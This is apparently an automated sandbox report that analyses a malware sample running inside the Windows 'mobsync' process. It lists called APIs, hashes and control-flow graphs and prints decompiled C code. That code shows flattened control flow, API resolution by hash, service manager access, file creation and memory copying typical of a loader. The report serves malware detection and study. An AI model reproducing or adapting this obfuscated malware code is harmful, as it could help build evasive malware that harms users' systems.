                                                                                0x002c9a99
                                                                                0x002c9a9b
                                                                                0x002c9aa0
                                                                                0x002c9aa2
                                                                                0x002c9ab5
                                                                                0x002c9aba
                                                                                0x002c9aba
                                                                                0x002c9ac7
                                                                                0x002c9ac9
                                                                                0x002c9ace
                                                                                0x002c9ad0
                                                                                0x002c9b4f
                                                                                0x002c9b58
                                                                                0x002c9ad2
                                                                                0x002c9ad2
                                                                                0x002c9ad9
                                                                                0x00000000
                                                                                0x002c9ad9
                                                                                0x002c99f3
                                                                                0x002c99f3
                                                                                0x002c99f8
                                                                                0x002c9a47
                                                                                0x002c9a49
                                                                                0x002c9a61
                                                                                0x002c9a61
                                                                                0x002c9a67
                                                                                0x002c9a69
                                                                                0x00000000
                                                                                0x002c99fa
                                                                                0x002c99fa
                                                                                0x002c99ff
                                                                                0x00000000
                                                                                0x002c9a05
                                                                                0x002c9a05
                                                                                0x002c9a0d
                                                                                0x002c9a12
                                                                                0x002c9a17
                                                                                0x002c9a1f
                                                                                0x002c9a24
                                                                                0x002c9a2c
                                                                                0x002c9a31
                                                                                0x002c9a38
                                                                                0x00000000
                                                                                0x002c9a38
                                                                                0x002c99ff
                                                                                0x002c99f8
                                                                                0x002c99ed
                                                                                0x00000000
                                                                                0x002c9aea
                                                                                0x002c9aea
                                                                                0x002c9aea
                                                                                0x002c9b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,005DE030), ref: 002C997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 002C99BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 002C9A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 002C9B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$H]$Y4[0
                                                                                • API String ID: 2382770032-1573364464
                                                                                • Opcode ID: d131fd23e53a1cc9e329ecea33fa1bff403723be1c79767a93993b018d8bcd6f
                                                                                • Instruction ID: f521dc266ec1013c5a45b67a2a9603f45524dd34b95ef8148f45c0c705176b9e
                                                                                • Opcode Fuzzy Hash: d131fd23e53a1cc9e329ecea33fa1bff403723be1c79767a93993b018d8bcd6f
                                                                                • Instruction Fuzzy Hash: 7B6109317243069BDB18EF68AC8DF6A7295EBA0708F104A2DF005DB351EA70DD64CBD6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 2c8400-2c84df 106 2c84e3-2c84e9 105->106 107 2c84ef 106->107 108 2c85c8-2c85ce 106->108 109 2c866c-2c86b4 call 2cb6e0 107->109 110 2c84f5-2c84fb 107->110 111 2c8630-2c8637 108->111 112 2c85d0-2c85d6 108->112 122 2c85bd-2c85c7 109->122 133 2c86ba 109->133 113 2c84fd-2c8503 110->113 114 2c854a-2c8551 110->114 118 2c8639-2c864f call 2c3f00 call 2c3e60 111->118 119 2c8654-2c8667 111->119 115 2c85d8-2c85e0 112->115 116 2c85b1-2c85b7 112->116 123 2c8505-2c850b 113->123 124 2c8543-2c8548 113->124 120 2c856e-2c8591 114->120 121 2c8553-2c8569 call 2c3f00 call 2c3e60 114->121 125 2c8600-2c8624 CreateFileW 115->125 126 2c85e2-2c85fa call 2c3f00 call 2c3e60 115->126 116->106 116->122 118->119 119->106 148 2c85ae 120->148 149 2c8593-2c85a9 call 2c3f00 call 2c3e60 120->149 121->120 123->116 131 2c8511-2c8518 123->131 124->106 125->122 134 2c8626-2c862b 125->134 126->125 138 2c851a-2c8530 call 2c3f00 call 2c3e60 131->138 139 2c8535-2c8541 131->139 142 2c86bc-2c86be 133->142 143 2c86c4-2c86d1 133->143 134->106 138->139 139->106 142->122 142->143 148->116 149->148
                                                                                C-Code - Quality: 66%
                                                                                			E002C8400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E002CB6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x2cdec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E002C3F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E002C3E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x2cdec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x2cde3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E002C3F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E002C3E60(_t101, _t98, 0x20de7595, _t126);
									 *0x2cde3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x2ce1d4;
										if(_t93 == 0) {
											_t97 = E002C3F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E002C3E60(_t101, _t97, 0xa229df38, _t126);
											 *0x2ce1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x2ce3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E002C3F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E002C3E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x2ce3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x2cde04;
							if( *0x2cde04 == 0) {
								_t95 = E002C3F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x2cde04 = E002C3E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x002c8400
                                                                                0x002c8400
                                                                                0x002c8406
                                                                                0x002c840e
                                                                                0x002c8416
                                                                                0x002c841e
                                                                                0x002c8426
                                                                                0x002c842b
                                                                                0x002c8430
                                                                                0x002c8438
                                                                                0x002c8440
                                                                                0x002c8445
                                                                                0x002c844a
                                                                                0x002c8452
                                                                                0x002c845a
                                                                                0x002c8462
                                                                                0x002c846a
                                                                                0x002c8472
                                                                                0x002c847a
                                                                                0x002c8482
                                                                                0x002c8491
                                                                                0x002c8496
                                                                                0x002c849a
                                                                                0x002c84a2
                                                                                0x002c84af
                                                                                0x002c84b3
                                                                                0x002c84bb
                                                                                0x002c84c3
                                                                                0x002c84cb
                                                                                0x002c84cf
                                                                                0x002c84d7
                                                                                0x002c84df
                                                                                0x002c84df
                                                                                0x002c84e3
                                                                                0x002c84e3
                                                                                0x002c84e3
                                                                                0x002c84e3
                                                                                0x002c84e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c84ef
                                                                                0x002c866e
                                                                                0x002c8676
                                                                                0x002c8696
                                                                                0x002c869a
                                                                                0x002c86a2
                                                                                0x002c86a6
                                                                                0x002c86aa
                                                                                0x002c86b2
                                                                                0x002c86b4
                                                                                0x00000000
                                                                                0x002c86ba
                                                                                0x002c86ba
                                                                                0x002c86c5
                                                                                0x002c86d1
                                                                                0x002c86bc
                                                                                0x002c86bc
                                                                                0x002c86be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c86be
                                                                                0x002c86ba
                                                                                0x002c84f5
                                                                                0x002c84fb
                                                                                0x002c854a
                                                                                0x002c854f
                                                                                0x002c8551
                                                                                0x002c8558
                                                                                0x002c855d
                                                                                0x002c8564
                                                                                0x002c8569
                                                                                0x002c8569
                                                                                0x002c8578
                                                                                0x002c857c
                                                                                0x002c857e
                                                                                0x002c8589
                                                                                0x002c858f
                                                                                0x002c8591
                                                                                0x002c8598
                                                                                0x002c859d
                                                                                0x002c85a4
                                                                                0x002c85a9
                                                                                0x002c85a9
                                                                                0x002c85af
                                                                                0x00000000
                                                                                0x002c84fd
                                                                                0x002c8503
                                                                                0x002c8543
                                                                                0x00000000
                                                                                0x002c8505
                                                                                0x002c850b
                                                                                0x00000000
                                                                                0x002c8511
                                                                                0x002c8511
                                                                                0x002c8518
                                                                                0x002c851f
                                                                                0x002c8524
                                                                                0x002c852b
                                                                                0x002c8530
                                                                                0x002c8530
                                                                                0x002c853a
                                                                                0x002c853c
                                                                                0x00000000
                                                                                0x002c853c
                                                                                0x002c850b
                                                                                0x002c8503
                                                                                0x002c84fb
                                                                                0x00000000
                                                                                0x002c84ef
                                                                                0x002c85c8
                                                                                0x002c85ce
                                                                                0x002c8630
                                                                                0x002c8635
                                                                                0x002c8637
                                                                                0x002c863e
                                                                                0x002c8643
                                                                                0x002c864a
                                                                                0x002c864f
                                                                                0x002c864f
                                                                                0x002c8660
                                                                                0x002c8662
                                                                                0x00000000
                                                                                0x002c85d0
                                                                                0x002c85d0
                                                                                0x002c85d6
                                                                                0x00000000
                                                                                0x002c85d8
                                                                                0x002c85de
                                                                                0x002c85e0
                                                                                0x002c85e7
                                                                                0x002c85ec
                                                                                0x002c85fa
                                                                                0x002c85fa
                                                                                0x002c861d
                                                                                0x002c861f
                                                                                0x002c8621
                                                                                0x002c8624
                                                                                0x00000000
                                                                                0x002c8626
                                                                                0x002c8626
                                                                                0x00000000
                                                                                0x002c8626
                                                                                0x002c8624
                                                                                0x002c85d6
                                                                                0x00000000
                                                                                0x002c85b1
                                                                                0x002c85b1
                                                                                0x002c85b1
                                                                                0x002c85bd
                                                                                0x002c85bd
                                                                                0x002c85c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 002C861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: 592363d2a89a2bb25631a03d58282e79897c020c971da1c3d0d4f4c85297fe06
                                                                                • Instruction ID: e0d38d88c76cc4f361a0b471e1c9d5711330a9148dfb022526f77ea48b6ad810
                                                                                • Opcode Fuzzy Hash: 592363d2a89a2bb25631a03d58282e79897c020c971da1c3d0d4f4c85297fe06
                                                                                • Instruction Fuzzy Hash: 3661D271A183129BC718DF68C445F6FBAE5ABA0754F00CA1CF49997290DBB4DD188F82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002B0D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 2b0d60-2b0dd5 call 2b0ed0 VirtualAlloc RtlMoveMemory 164 2b0ddb-2b0dde 160->164 165 2b0ebe-2b0ec4 160->165 164->165 166 2b0de4-2b0de6 164->166 166->165 167 2b0dec-2b0df0 166->167 167->165 169 2b0df6-2b0dfd 167->169 170 2b0eaf-2b0ebb 169->170 171 2b0e03-2b0e36 call 2b1140 RtlMoveMemory 169->171 171->165 175 2b0e3c-2b0e4a VirtualAlloc 171->175 176 2b0e89-2b0ea0 RtlFillMemory 175->176 177 2b0e4c-2b0e52 175->177 176->165 183 2b0ea2-2b0ea5 176->183 178 2b0e5a-2b0e68 177->178 179 2b0e54-2b0e56 177->179 178->165 180 2b0e6a-2b0e7d RtlMoveMemory 178->180 179->178 180->165 182 2b0e7f-2b0e83 180->182 182->165 184 2b0e85 182->184 183->165 185 2b0ea7-2b0ea9 183->185 184->176 185->170 185->171
                                                                                APIs
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002B0F08
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002B0F3E
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002B0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002B0DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002B0DC3
                                                                                  • Part of subcall function 002B1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002B0EFD,00000000), ref: 002B1155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002B0E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002B0E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002B0E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 002B0E98
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 48094c0b05b495805bd32a2923f1af834b299a38f4ad6dca813bff284954febe
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 1331E3B1A243416BD315EB20CCD4AEB73E9EBC83C0F080D2CB94993351D635E8A08B62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C8E80, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 186 2c8e80-2c8e98 187 2c8ea0-2c8ea5 186->187 188 2c8f7a-2c8f7f 187->188 189 2c8eab 187->189 190 2c8f85-2c8f8a 188->190 191 2c9011-2c9016 188->191 192 2c8f3f-2c8f46 189->192 193 2c8eb1-2c8eb6 189->193 196 2c8f8c-2c8f91 190->196 197 2c8fce-2c8fd5 190->197 191->187 194 2c8f48-2c8f5e call 2c3f00 call 2c3e60 192->194 195 2c8f63-2c8f75 192->195 198 2c8ebc-2c8ec1 193->198 199 2c901b-2c9022 193->199 194->195 195->187 205 2c8fbb-2c8fc0 196->205 206 2c8f93-2c8fa3 196->206 201 2c8fd7-2c8fed call 2c3f00 call 2c3e60 197->201 202 2c8ff2-2c900c OpenServiceW 197->202 207 2c8efc-2c8f03 198->207 208 2c8ec3-2c8ec8 198->208 203 2c903f 199->203 204 2c9024-2c903a call 2c3f00 call 2c3e60 199->204 201->202 202->187 221 2c9042-2c9049 203->221 204->203 205->187 212 2c8fc6-2c8fcd 205->212 209 2c8fae-2c8fb6 206->209 210 2c8fa5-2c8fac 206->210 215 2c8f05-2c8f1b call 2c3f00 call 2c3e60 207->215 216 2c8f20-2c8f2f 207->216 208->205 211 2c8ece-2c8ed5 208->211 209->187 210->209 210->210 219 2c8ed7-2c8eed call 2c3f00 call 2c3e60 211->219 220 2c8ef2-2c8efa 211->220 215->216 216->221 233 2c8f35-2c8f3a 216->233 219->220 220->187 233->187
                                                                                C-Code - Quality: 66%
                                                                                			E002C8E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x2ce270 == 0) {
									 *0x2ce270 = E002C3E60(_t25, E002C3F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x2ce54c; // 0x5de048
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x2ce4c8;
						if(_t11 == 0) {
							_t11 = E002C3E60(_t25, E002C3F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x2ce4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x2ce18c;
							if(_t15 == 0) {
								_t15 = E002C3E60(_t25, E002C3F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x2ce18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x2ce310;
								if(_t19 == 0) {
									_t19 = E002C3E60(_t25, E002C3F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x2ce310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x2ce18c;
									if(_t22 == 0) {
										_t22 = E002C3E60(_t25, E002C3F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x2ce18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x002c8e82
                                                                                0x002c8e86
                                                                                0x002c8e8c
                                                                                0x002c8e91
                                                                                0x002c8e96
                                                                                0x002c8e98
                                                                                0x002c8ea0
                                                                                0x002c8ea0
                                                                                0x002c8ea0
                                                                                0x002c8ea0
                                                                                0x002c8ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c8f7f
                                                                                0x002c9011
                                                                                0x00000000
                                                                                0x002c8f85
                                                                                0x002c8f8a
                                                                                0x002c8fd5
                                                                                0x002c8fed
                                                                                0x002c8fed
                                                                                0x002c8ff9
                                                                                0x002c8ffb
                                                                                0x002c9009
                                                                                0x00000000
                                                                                0x002c8f8c
                                                                                0x002c8f91
                                                                                0x00000000
                                                                                0x002c8f93
                                                                                0x002c8f93
                                                                                0x002c8f99
                                                                                0x002c8fa3
                                                                                0x002c8fa5
                                                                                0x002c8fa8
                                                                                0x002c8fae
                                                                                0x002c8fb1
                                                                                0x00000000
                                                                                0x002c8fb1
                                                                                0x002c8f91
                                                                                0x002c8f8a
                                                                                0x00000000
                                                                                0x002c8f7f
                                                                                0x002c8eab
                                                                                0x002c8f3f
                                                                                0x002c8f46
                                                                                0x002c8f59
                                                                                0x002c8f5e
                                                                                0x002c8f5e
                                                                                0x002c8f64
                                                                                0x002c8f6d
                                                                                0x002c8f70
                                                                                0x00000000
                                                                                0x002c8eb1
                                                                                0x002c8eb6
                                                                                0x002c901b
                                                                                0x002c9022
                                                                                0x002c9035
                                                                                0x002c903a
                                                                                0x002c903a
                                                                                0x002c9040
                                                                                0x00000000
                                                                                0x002c8ebc
                                                                                0x002c8ec1
                                                                                0x002c8efc
                                                                                0x002c8f03
                                                                                0x002c8f16
                                                                                0x002c8f1b
                                                                                0x002c8f1b
                                                                                0x002c8f2b
                                                                                0x002c8f2f
                                                                                0x002c9042
                                                                                0x002c9049
                                                                                0x002c8f35
                                                                                0x002c8f35
                                                                                0x00000000
                                                                                0x002c8f35
                                                                                0x002c8ec3
                                                                                0x002c8ec8
                                                                                0x00000000
                                                                                0x002c8ece
                                                                                0x002c8ece
                                                                                0x002c8ed5
                                                                                0x002c8ee8
                                                                                0x002c8eed
                                                                                0x002c8eed
                                                                                0x002c8ef3
                                                                                0x002c8ef5
                                                                                0x00000000
                                                                                0x002c8ef5
                                                                                0x002c8ec8
                                                                                0x002c8ec1
                                                                                0x002c8eb6
                                                                                0x00000000
                                                                                0x002c8fbb
                                                                                0x002c8fbb
                                                                                0x002c8fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,005DE048,002C8782,?,3251FEFE,?), ref: 002C8FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: H]$uw(#$uw(#
                                                                                • API String ID: 3098006287-3016388793
                                                                                • Opcode ID: 40e96711856e2a04104ff4746a20c7a22dab6b72b86960943b02e03291251acb
                                                                                • Instruction ID: a9d0e8e1ad31a307d7076bad29654b065bc46973d31da77b13182c2ec229f6c7
                                                                                • Opcode Fuzzy Hash: 40e96711856e2a04104ff4746a20c7a22dab6b72b86960943b02e03291251acb
                                                                                • Instruction Fuzzy Hash: 43412831B242059BDF209BBCAC84F7A26D6AB94750F558E2DF905C7B41EE70CC604B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C7120, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 241 2c7120 242 2c7125-2c712a 241->242 243 2c71b4-2c71b9 242->243 244 2c7130 242->244 247 2c71bb 243->247 248 2c7207-2c720c 243->248 245 2c7136-2c713b 244->245 246 2c7233-2c7248 call 2c34c0 244->246 249 2c713d 245->249 250 2c7190-2c7195 245->250 269 2c724a-2c7260 call 2c3f00 call 2c3e60 246->269 270 2c7265-2c7278 LoadLibraryW 246->270 252 2c71bd-2c71c2 247->252 253 2c71ee-2c7202 call 2c7080 247->253 254 2c720e-2c7222 call 2c7080 248->254 255 2c7227-2c722c 248->255 259 2c713f-2c7144 249->259 260 2c717a-2c718e call 2c7080 249->260 250->255 256 2c719b-2c71af call 2c7080 250->256 262 2c71c4-2c71c9 252->262 263 2c71d5-2c71e9 call 2c7080 252->263 253->242 254->242 255->242 258 2c7232 255->258 256->242 267 2c7164-2c7178 call 2c7080 259->267 268 2c7146-2c714b 259->268 260->242 262->255 271 2c71cb-2c71d0 262->271 263->242 267->242 268->255 276 2c7151-2c7162 call 2c7080 268->276 269->270 280 2c727a-2c7290 call 2c3f00 call 2c3e60 270->280 281 2c7295-2c72a0 270->281 271->242 276->242 280->281 292 2c72bd-2c72c5 281->292 293 2c72a2-2c72b8 call 2c3f00 call 2c3e60 281->293 293->292
                                                                                C-Code - Quality: 85%
                                                                                			E002C7120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E002C34C0(0x2cd830);
							__eflags =  *0x2cdd1c;
							if( *0x2cdd1c == 0) {
								 *0x2cdd1c = E002C3E60(_t21, E002C3F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x2ce548; // 0x617e20
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x2ce494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E002C3E60(_t21, E002C3F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x2ce494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x2cdf30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E002C3E60(_t21, E002C3F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x2cdf30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E002C7080(_t21, 0x2cd7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E002C7080(_t21, 0x2cd8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E002C7080(_t21, 0x2cd800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
